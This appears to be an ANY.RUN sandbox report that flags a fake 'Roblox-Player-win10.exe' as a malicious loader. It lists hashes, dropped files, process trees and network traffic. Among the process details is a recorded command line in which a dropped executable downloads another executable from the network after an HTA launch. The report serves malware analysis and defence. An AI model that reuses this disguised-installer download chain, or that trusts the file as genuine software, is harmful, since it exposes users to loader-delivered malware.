File name:

Roblox-Player-win10.exe

Full analysis: https://app.any.run/tasks/63b37145-d597-492f-bb7f-fad0bd18460e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: September 29, 2024, 15:38:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

9F6CFC85691E5369C29C83408B938154

SHA1:

4F6A99703EDCF17745F10BCFF17B13A29BE5EAD5

SHA256:

89A009ED9F444004A3B789D423330275839FEBC20A66C78795AE10C18E238983

SSDEEP:

98304:hzC7cJrQTh1ry9zBWWdHlFP8//h0urXbtP2BD8+T3yH/7EHYMrM87zaGsHCORtHg:igPf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • Roblox-Player-win10.exe (PID: 1448)

    • Executable content was dropped or overwritten

      • Roblox-Player-win10.exe (PID: 1448)
      • KcRqluY.exe (PID: 5924)

    • Drops 7-zip archiver for unpacking

      • Roblox-Player-win10.exe (PID: 1448)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 2180)

  • INFO

    • Reads the computer name

      • Roblox-Player-win10.exe (PID: 1448)
      • KcRqluY.exe (PID: 5924)

    • Checks supported languages

      • Roblox-Player-win10.exe (PID: 1448)
      • KcRqluY.exe (PID: 5924)

    • Create files in a temporary directory

      • Roblox-Player-win10.exe (PID: 1448)
      • KcRqluY.exe (PID: 5924)

    • The process uses the downloaded file

      • Roblox-Player-win10.exe (PID: 1448)
      • mshta.exe (PID: 2180)

    • Process checks computer location settings

      • Roblox-Player-win10.exe (PID: 1448)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2180)

    • Checks proxy server information

      • mshta.exe (PID: 2180)

    • Reads the machine GUID from the registry

      • KcRqluY.exe (PID: 5924)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2009:08:16 11:05:43+00:00
ImageFileCharacteristics: No relocs, Executable, 32-bit
PEType: PE32
LinkerVersion: 9
CodeSize: 48640
InitializedDataSize: 71680
UninitializedDataSize: -
EntryPoint: 0x912e
OSVersion: 5
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
125
Monitored processes
5
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start roblox-player-win10.exe mshta.exe no specs kcrqluy.exe conhost.exe no specs roblox-player-win10.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1448"C:\Users\admin\Desktop\Roblox-Player-win10.exe" C:\Users\admin\Desktop\Roblox-Player-win10.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\desktop\roblox-player-win10.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
2180"C:\Windows\SysWOW64\mshta.exe" "C:\Users\admin\AppData\Local\Temp\RarSFX0\start.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\SysWOW64\mshta.exeRoblox-Player-win10.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2212\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeKcRqluY.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3396"C:\Users\admin\Desktop\Roblox-Player-win10.exe" C:\Users\admin\Desktop\Roblox-Player-win10.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\desktop\roblox-player-win10.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
5924"C:\Users\admin\AppData\Local\Temp\RarSFX0\KcRqluY.exe" -O MwHFadC.exe https://download.yandex.ru/yandex-pack/downloader/downloader.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\KcRqluY.exe
mshta.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\rarsfx0\kcrqluy.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
Total events
3 433
Read events
3 428
Write events
5
Delete events
0

Modification events

(PID) Process:(1448) Roblox-Player-win10.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hta\OpenWithProgids
Operation:writeName:htafile
Value:
(PID) Process:(2180) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2180) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2180) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
5
Suspicious files
1
Text files
15
Unknown types
0

Dropped files

PID
Process
Filename
Type
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\7z.exeexecutable
MD5:2D1C72072FEC74FB0ECA850EF8F9F93E
SHA256:B93149E44239DBDD5E6705C73AE14EE11285923E963E41E8D142E4171F20F4EB
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\anim.gifimage
MD5:7E62AEBA4E8BD8A4D1C5C33F1961DCDB
SHA256:BAD6F9186B0DBA551360CC446EEC00CEB73B244F635BF0D30BECF541E2C3F8CE
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\img\log-game.pngimage
MD5:0FD141306E06EF59CABCE6F76D4F3D7E
SHA256:F19B0E9FEFD718789D8316566AED028B13F43955071F2A4C422EA5C09FBDBEFA
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\gam-page.htmlhtml
MD5:260AD26EC3790D4097D4E041B8C57C61
SHA256:1A3DEE4210170A383E74D81014EF04425C52D3123F0757BAFFF49EB752EA8EBD
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\KcRqluY.exeexecutable
MD5:E314B40A188DE73B6A16A8197F80EE68
SHA256:D6E2656521CA76AD47AD2C503C9F71B3D00820E8B05275D048F7DEA0C9C30BEB
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\gteb.vbstext
MD5:61B247072862E87AA9C44CA21CD0A089
SHA256:82BBC5E067DFA25D5E7DF3BB1584ED04D9CD3FDFC7A425FE7F55830E76748C86
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\icons.zipcompressed
MD5:8E19D23C6D6FE77B8DF29A016BC949A9
SHA256:EB569E329EF77A425D7EC5E5CE36D4BEB1659E10DCA76731A863DBAE52DA1EBC
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\icon.pngimage
MD5:D26F29F9F1AD2C636C15091FF4B0A372
SHA256:4ECE660F4319AAC01EBEC9598ED1295FAC9B19EFCFBC4F9CD0437D7F83C77D1F
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\img\master-logo.pngimage
MD5:E7AFB5430B81607FB19FA26A999F0EEB
SHA256:CBA188DEF181F039DC7628177161C2179FE2D2C4E4FB6C50815B8E60ECA7D1FA
1448Roblox-Player-win10.exeC:\Users\admin\AppData\Local\Temp\RarSFX0\img\logo-offer.pngimage
MD5:072679C20456E6B83EA3707A7C4E7B6F
SHA256:8A0087C2D38FA04F54E2F8A39310EB6FBDC8849C61A55AE235D4B121052A2E6A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
28
DNS requests
6
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3928
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
DE
binary
973 b
whitelisted
GET
302
37.9.117.27:443
https://download.yandex.ru/yandex-pack/downloader/downloader.exe
RU
unknown
GET
200
5.45.200.104:443
https://cachev2-fra-01.cdn.yandex.net/download.yandex.ru/yandex-pack/downloader/downloader.exe?lid=293
RU
executable
203 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3928
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
3928
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5924
KcRqluY.exe
5.45.205.243:443
download.yandex.ru
YANDEX LLC
RU
whitelisted
3928
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5924
KcRqluY.exe
5.45.200.104:443
cachev2-fra-01.cdn.yandex.net
YANDEX LLC
RU
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 172.217.18.110
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
download.yandex.ru
  • 5.45.205.243
  • 5.45.205.245
  • 5.45.205.244
  • 5.45.205.241
  • 5.45.205.242
whitelisted
cachev2-fra-01.cdn.yandex.net
  • 5.45.200.104
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO Wget Request for Executable
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Roblox-Player-win10.exe